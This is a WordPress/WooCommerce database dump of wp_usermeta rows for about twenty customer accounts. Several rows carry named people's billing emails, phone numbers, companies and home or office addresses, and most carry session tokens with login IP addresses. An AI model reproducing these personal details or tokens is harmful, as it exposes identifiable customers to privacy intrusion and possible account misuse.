INSERT INTO `wp_usermeta` VALUES (8483, 511, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (8484, 511, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (8485, 511, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8486, 511, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (8487, 511, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (8488, 511, '_yoast_wpseo_profile_updated', '1488822527'); 
INSERT INTO `wp_usermeta` VALUES (8490, 511, 'last_update', '1488822637'); 
INSERT INTO `wp_usermeta` VALUES (8491, 511, 'billing_first_name', 'Crystal'); 
INSERT INTO `wp_usermeta` VALUES (8492, 511, 'billing_last_name', 'Beaugez'); 
INSERT INTO `wp_usermeta` VALUES (8493, 511, 'billing_company', 'Louisville Slugger Innovation'); 
INSERT INTO `wp_usermeta` VALUES (8494, 511, 'billing_email', 'crystal.beaugez@slugger.com'); 
INSERT INTO `wp_usermeta` VALUES (8495, 511, 'billing_phone', '916-652-4267'); 
INSERT INTO `wp_usermeta` VALUES (8496, 511, 'billing_country', 'US'); 
INSERT INTO `wp_usermeta` VALUES (8497, 511, 'billing_address_1', '5960 Jetton Lane'); 
INSERT INTO `wp_usermeta` VALUES (8498, 511, 'billing_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (8499, 511, 'billing_city', 'LOOMIS'); 
INSERT INTO `wp_usermeta` VALUES (8500, 511, 'billing_state', 'CA'); 
INSERT INTO `wp_usermeta` VALUES (8501, 511, 'billing_postcode', '95650'); 
INSERT INTO `wp_usermeta` VALUES (8502, 511, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (8503, 512, 'nickname', 'air0gln'); 
INSERT INTO `wp_usermeta` VALUES (8504, 512, 'first_name', 'Gail'); 
INSERT INTO `wp_usermeta` VALUES (8505, 512, 'last_name', 'Newsome'); 
INSERT INTO `wp_usermeta` VALUES (8506, 512, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (8507, 512, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8508, 512, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (8509, 512, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (8510, 512, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (8511, 512, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8512, 512, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (8513, 512, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (8514, 512, '_yoast_wpseo_profile_updated', '1488824879'); 
INSERT INTO `wp_usermeta` VALUES (8515, 512, 'session_tokens', 'a:3:{s:64:"5bc1afdece749e769b7ca2d8ece11b3566731b45c161915475e4f37eaf89950c";a:4:{s:10:"expiration";i:1490034480;s:2:"ip";s:12:"153.2.247.36";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1488824880;}s:64:"aa6e5aaab52426d17f50b99ef02fe04700a5ecf44c6912059a616d890e526c73";a:4:{s:10:"expiration";i:1490034519;s:2:"ip";s:12:"153.2.247.36";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1488824919;}s:64:"d3b78fd4389a7a9e2632b8977b5f7fb7bfdcf7e1c820b2439d8fb14b8cdcf237";a:4:{s:10:"expiration";i:1488997746;s:2:"ip";s:12:"153.2.247.36";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1488824946;}}'); 
INSERT INTO `wp_usermeta` VALUES (8516, 512, 'last_update', '1488824915'); 
INSERT INTO `wp_usermeta` VALUES (8517, 512, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (8518, 513, 'nickname', 'james.macheras'); 
INSERT INTO `wp_usermeta` VALUES (8519, 513, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8520, 513, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8521, 513, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (8522, 513, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8523, 513, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (8524, 513, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (8525, 513, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (8526, 513, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8527, 513, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (8528, 513, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (8529, 513, '_yoast_wpseo_profile_updated', '1488836356'); 
INSERT INTO `wp_usermeta` VALUES (8530, 513, 'session_tokens', 'a:1:{s:64:"e0374b924e703faefd786242a6473bf3b0ca0eb58d9bea9bbe03c0c36ad422a0";a:4:{s:10:"expiration";i:1490046256;s:2:"ip";s:13:"165.225.34.54";s:2:"ua";s:108:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36";s:5:"login";i:1488836656;}}'); 
INSERT INTO `wp_usermeta` VALUES (8531, 514, 'nickname', 'david.gilfoy'); 
INSERT INTO `wp_usermeta` VALUES (8532, 514, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8533, 514, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8534, 514, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (8535, 514, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8536, 514, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (8537, 514, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (8538, 514, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (8539, 514, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8540, 514, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (8541, 514, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (8542, 514, '_yoast_wpseo_profile_updated', '1488894463'); 
INSERT INTO `wp_usermeta` VALUES (8543, 514, 'session_tokens', 'a:1:{s:64:"50e341990fabf598d601f03ac8633e8d65cce6a55beed0e3bb7e83469c1f47c2";a:4:{s:10:"expiration";i:1490104072;s:2:"ip";s:14:"216.136.37.130";s:2:"ua";s:109:"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36";s:5:"login";i:1488894472;}}'); 
INSERT INTO `wp_usermeta` VALUES (8544, 515, 'nickname', 'Anthony_vega_5'); 
INSERT INTO `wp_usermeta` VALUES (8545, 515, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8546, 515, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8547, 515, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (8548, 515, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8549, 515, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (8550, 515, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (8551, 515, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (8552, 515, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8553, 515, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (8554, 515, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (8555, 515, '_yoast_wpseo_profile_updated', '1488907253'); 
INSERT INTO `wp_usermeta` VALUES (8557, 515, 'session_tokens', 'a:1:{s:64:"8ae3aa8320e3efbb7d2161b8a711c62b7e406210dc327ee6d5c9342090c43ea6";a:4:{s:10:"expiration";i:1490117012;s:2:"ip";s:15:"104.174.195.135";s:2:"ua";s:74:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; NMJB; rv:11.0) like Gecko";s:5:"login";i:1488907412;}}'); 
INSERT INTO `wp_usermeta` VALUES (8558, 510, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (8559, 516, 'nickname', 'marcos.sergio'); 
INSERT INTO `wp_usermeta` VALUES (8560, 516, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8561, 516, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8562, 516, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (8563, 516, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8564, 516, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (8565, 516, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (8566, 516, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (8567, 516, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8568, 516, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (8569, 516, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (8570, 516, '_yoast_wpseo_profile_updated', '1488911598'); 
INSERT INTO `wp_usermeta` VALUES (8571, 516, 'session_tokens', 'a:1:{s:64:"1457692b93d5498d58f2c26584a57a9b06c2ef02e7e08f338abdfd808ac49ad0";a:4:{s:10:"expiration";i:1490121208;s:2:"ip";s:12:"189.2.53.100";s:2:"ua";s:101:"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36";s:5:"login";i:1488911608;}}'); 
INSERT INTO `wp_usermeta` VALUES (8572, 517, 'nickname', 'lvuki'); 
INSERT INTO `wp_usermeta` VALUES (8573, 517, 'first_name', 'Lucy'); 
INSERT INTO `wp_usermeta` VALUES (8574, 517, 'last_name', 'Vuki'); 
INSERT INTO `wp_usermeta` VALUES (8575, 517, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (8576, 517, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8577, 517, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (8578, 517, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (8579, 517, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (8580, 517, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8581, 517, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (8582, 517, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (8583, 517, '_yoast_wpseo_profile_updated', '1488913876'); 
INSERT INTO `wp_usermeta` VALUES (8584, 517, 'session_tokens', 'a:1:{s:64:"19caf239f41627e47fadfb84663057c12efc4ce0d8f766aeff1eee162f956669";a:4:{s:10:"expiration";i:1490123484;s:2:"ip";s:14:"69.198.192.163";s:2:"ua";s:108:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36";s:5:"login";i:1488913884;}}'); 
INSERT INTO `wp_usermeta` VALUES (8585, 517, 'last_update', '1488913927'); 
INSERT INTO `wp_usermeta` VALUES (8586, 517, 'billing_first_name', 'Lucy'); 
INSERT INTO `wp_usermeta` VALUES (8587, 517, 'billing_last_name', 'Vuki'); 
INSERT INTO `wp_usermeta` VALUES (8588, 517, 'billing_company', 'NTK AVIATION AMERICA, INC.'); 
INSERT INTO `wp_usermeta` VALUES (8589, 517, 'billing_email', 'lvuki@ntkaviation.com'); 
INSERT INTO `wp_usermeta` VALUES (8590, 517, 'billing_phone', '3107822700'); 
INSERT INTO `wp_usermeta` VALUES (8591, 517, 'billing_country', 'US'); 
INSERT INTO `wp_usermeta` VALUES (8592, 517, 'billing_address_1', '430 Madrid Avenue'); 
INSERT INTO `wp_usermeta` VALUES (8593, 517, 'billing_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (8594, 517, 'billing_city', 'Torrance'); 
INSERT INTO `wp_usermeta` VALUES (8595, 517, 'billing_state', 'CA'); 
INSERT INTO `wp_usermeta` VALUES (8596, 517, 'billing_postcode', '90501'); 
INSERT INTO `wp_usermeta` VALUES (8597, 517, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (8599, 518, 'nickname', 'dave'); 
INSERT INTO `wp_usermeta` VALUES (8600, 518, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8601, 518, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8602, 518, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (8603, 518, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8604, 518, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (8605, 518, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (8606, 518, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (8607, 518, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8608, 518, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (8609, 518, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (8610, 518, '_yoast_wpseo_profile_updated', '1488990014'); 
INSERT INTO `wp_usermeta` VALUES (8611, 518, 'session_tokens', 'a:1:{s:64:"2b57461422a1837179f3811fce27ed81edd4a0351ce242b49d6afc543f58377a";a:4:{s:10:"expiration";i:1490199628;s:2:"ip";s:12:"69.228.32.12";s:2:"ua";s:76:"Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko";s:5:"login";i:1488990028;}}'); 
INSERT INTO `wp_usermeta` VALUES (8612, 519, 'nickname', 'info2'); 
INSERT INTO `wp_usermeta` VALUES (8613, 519, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8614, 519, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8615, 519, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (8616, 519, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8617, 519, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (8618, 519, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (8619, 519, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (8620, 519, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8621, 519, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (8622, 519, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (8623, 519, '_yoast_wpseo_profile_updated', '1488991478'); 
INSERT INTO `wp_usermeta` VALUES (8624, 519, 'session_tokens', 'a:1:{s:64:"8788702354f10867d617450d82657936075185bdbb158378eb84878aaa39ca5c";a:4:{s:10:"expiration";i:1490201088;s:2:"ip";s:13:"108.33.228.26";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1488991488;}}'); 
INSERT INTO `wp_usermeta` VALUES (8625, 519, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (8626, 520, 'nickname', 'russell.irvine'); 
INSERT INTO `wp_usermeta` VALUES (8627, 520, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8628, 520, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8629, 520, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (8630, 520, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8631, 520, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (8632, 520, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (8633, 520, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (8634, 520, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8635, 520, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (8636, 520, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (8637, 520, '_yoast_wpseo_profile_updated', '1489002952'); 
INSERT INTO `wp_usermeta` VALUES (8638, 520, 'session_tokens', 'a:1:{s:64:"11188a4234876d6d9149461f2c87981c34f3890335765fd4ba403fc562d0b941";a:4:{s:10:"expiration";i:1490212561;s:2:"ip";s:13:"192.31.106.35";s:2:"ua";s:73:"Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1489002961;}}'); 
INSERT INTO `wp_usermeta` VALUES (8639, 521, 'nickname', 'vijji.4141'); 
INSERT INTO `wp_usermeta` VALUES (8640, 521, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8641, 521, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8642, 521, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (8643, 521, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8644, 521, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (8645, 521, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (8646, 521, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (8647, 521, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8648, 521, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (8649, 521, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (8650, 521, '_yoast_wpseo_profile_updated', '1489040516'); 
INSERT INTO `wp_usermeta` VALUES (8651, 521, 'session_tokens', 'a:1:{s:64:"eaa583ec8c03624c7bd560bc80b75a8b332e8dc011faa06fa55cecbedb22c507";a:4:{s:10:"expiration";i:1490250128;s:2:"ip";s:13:"121.243.44.34";s:2:"ua";s:65:"Mozilla/5.0 (Windows NT 5.1; rv:51.0) Gecko/20100101 Firefox/51.0";s:5:"login";i:1489040528;}}'); 
INSERT INTO `wp_usermeta` VALUES (8652, 522, 'nickname', 'mikeblue'); 
INSERT INTO `wp_usermeta` VALUES (8653, 522, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8654, 522, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8655, 522, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (8656, 522, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8657, 522, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (8658, 522, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (8659, 522, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (8660, 522, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8661, 522, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (8662, 522, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (8663, 522, '_yoast_wpseo_profile_updated', '1489067648'); 
INSERT INTO `wp_usermeta` VALUES (8664, 522, 'session_tokens', 'a:1:{s:64:"d12650257108f3e496eb931533a4f4f7aee0702ea5ba67868755a399cc18562b";a:4:{s:10:"expiration";i:1490277257;s:2:"ip";s:12:"66.162.21.86";s:2:"ua";s:71:"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)";s:5:"login";i:1489067657;}}'); 
INSERT INTO `wp_usermeta` VALUES (8665, 523, 'nickname', 'temekageillf8149'); 
INSERT INTO `wp_usermeta` VALUES (8666, 523, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8667, 523, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8668, 523, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (8669, 523, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8670, 523, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (8671, 523, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (8672, 523, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (8673, 523, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8674, 523, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (8675, 523, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (8676, 523, '_yoast_wpseo_profile_updated', '1489071441'); 
INSERT INTO `wp_usermeta` VALUES (8677, 523, 'session_tokens', 'a:1:{s:64:"d0ce8d5d5c0adb2576183a0f4008945923cac71eabe104d8c02b0fda0909818e";a:4:{s:10:"expiration";i:1490281053;s:2:"ip";s:14:"165.231.103.67";s:2:"ua";s:69:"Opera/9.80 (Windows NT 6.2; Win64; x64) Presto/2.12.388 Version/12.17";s:5:"login";i:1489071453;}}'); 
INSERT INTO `wp_usermeta` VALUES (8678, 523, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (8679, 524, 'nickname', 'mike.williams'); 
INSERT INTO `wp_usermeta` VALUES (8680, 524, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8681, 524, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8682, 524, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (8683, 524, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8684, 524, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (8685, 524, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (8686, 524, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (8687, 524, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8688, 524, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (8689, 524, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (8690, 524, '_yoast_wpseo_profile_updated', '1489075855'); 
INSERT INTO `wp_usermeta` VALUES (8692, 524, 'session_tokens', 'a:1:{s:64:"5e0d5587012193914dfe4868a6c438fd0da963ab9b2e25733f643efbddb1b907";a:4:{s:10:"expiration";i:1489248753;s:2:"ip";s:15:"108.171.131.188";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1489075953;}}'); 
INSERT INTO `wp_usermeta` VALUES (8693, 525, 'nickname', 'Joe.gabriele'); 
INSERT INTO `wp_usermeta` VALUES (8694, 525, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8695, 525, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8696, 525, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (8697, 525, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8698, 525, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (8699, 525, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (8700, 525, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (8701, 525, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8702, 525, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (8703, 525, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (8704, 525, '_yoast_wpseo_profile_updated', '1489080082'); 
INSERT INTO `wp_usermeta` VALUES (8705, 525, 'session_tokens', 'a:1:{s:64:"e4c5d7979e4b970484e690880a0204b4fd2999553b797794017a4ca5e70afea8";a:4:{s:10:"expiration";i:1490289691;s:2:"ip";s:15:"205.211.133.128";s:2:"ua";s:108:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36";s:5:"login";i:1489080091;}}'); 
INSERT INTO `wp_usermeta` VALUES (8706, 526, 'nickname', 'linda.combs'); 
INSERT INTO `wp_usermeta` VALUES (8707, 526, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8708, 526, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8709, 526, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (8710, 526, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8711, 526, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (8712, 526, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (8713, 526, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (8714, 526, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8715, 526, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (8716, 526, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (8717, 526, '_yoast_wpseo_profile_updated', '1489090918'); 
INSERT INTO `wp_usermeta` VALUES (8718, 526, 'session_tokens', 'a:1:{s:64:"947e3bb19b1b8b13bfd50e6fe87e9fa7eb64721350d071600b4bb522109deb9c";a:4:{s:10:"expiration";i:1490300526;s:2:"ip";s:14:"165.225.38.216";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1489090926;}}'); 
INSERT INTO `wp_usermeta` VALUES (8719, 526, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (8720, 527, 'nickname', 'jvazquez'); 
INSERT INTO `wp_usermeta` VALUES (8721, 527, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8722, 527, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8723, 527, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (8724, 527, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8725, 527, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (8726, 527, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (8727, 527, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (8728, 527, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8729, 527, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (8730, 527, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (8731, 527, '_yoast_wpseo_profile_updated', '1489097936'); 
INSERT INTO `wp_usermeta` VALUES (8734, 491, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (8735, 528, 'nickname', 'jeffmurrell'); 
INSERT INTO `wp_usermeta` VALUES (8736, 528, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8737, 528, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8738, 528, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (8739, 528, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8740, 528, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (8741, 528, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (8742, 528, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (8743, 528, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8744, 528, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (8745, 528, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (8746, 528, '_yoast_wpseo_profile_updated', '1489154026'); 
INSERT INTO `wp_usermeta` VALUES (8747, 528, 'session_tokens', 'a:1:{s:64:"8d1c0f6370a7b0d3cc21e1829f5a17a65f67475fb45f98df8e1673dc1358d062";a:4:{s:10:"expiration";i:1490363636;s:2:"ip";s:12:"97.82.80.100";s:2:"ua";s:108:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36";s:5:"login";i:1489154036;}}'); 
INSERT INTO `wp_usermeta` VALUES (8748, 529, 'nickname', 'kseymour'); 
INSERT INTO `wp_usermeta` VALUES (8749, 529, 'first_name', ''); 
